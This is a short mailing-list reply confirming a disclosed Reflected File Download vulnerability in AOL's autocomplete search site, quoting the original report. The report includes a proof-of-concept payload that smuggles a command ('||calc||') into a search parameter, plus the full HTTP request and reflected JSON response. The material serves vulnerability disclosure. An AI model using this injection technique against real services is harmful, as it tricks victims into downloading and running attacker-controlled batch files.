[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Reflected File Download in AOL Search Website

PoC confirmed to work with Safari 8.0.3 on OSx 10.10.2

Good find!

On 16/02/2015 16:15, "Ricardo Iramar dos Santos" <riramar@xxxxxxxxx> wrote:

>Oren Hafif reported a new kind of attack called Reflected File
>in Black Hat Europe 2014 conference.
>More details about the attack you can found in his public
>Google and Bing have already fixed the vulnerability but I've found
>the same vulnerability in AOL Search Website.
>A malicious user could send the link below to a victim that you
>download a malicious batch file from autocomplete.search.aol.com
>In the link below we have search for 'iramar "||calc||' using the AOL
>autocomplete domain. The browser will encode the double quotes but the
>server will escape it (\") and return inside the json on the body
>Since the response has the header "Content-Type:
>application/x-suggestions+json;charset=UTF-8" the browser will
>automatically try to download the reflected file. Chrome didn't try to
>download the file but Internet Explorer and Firefox will.
>Host: autocomplete.search.aol.com
>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
>Gecko/20100101 Firefox/33.0
>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>Accept-Language: en-US,en;q=0.5
>Accept-Encoding: gzip, deflate
>Cookie: ...
>Connection: keep-alive
>HTTP/1.1 200 OK
>Date: Tue, 21 Oct 2014 10:30:34 GMT
>Server: Apache-Coyote/1.1
>Content-Type: application/x-suggestions+json;charset=UTF-8
>Content-Language: en-US
>Content-Length: 24
>Keep-Alive: timeout=5, max=10
>Connection: Keep-Alive
>["iramar\"||calc||", []]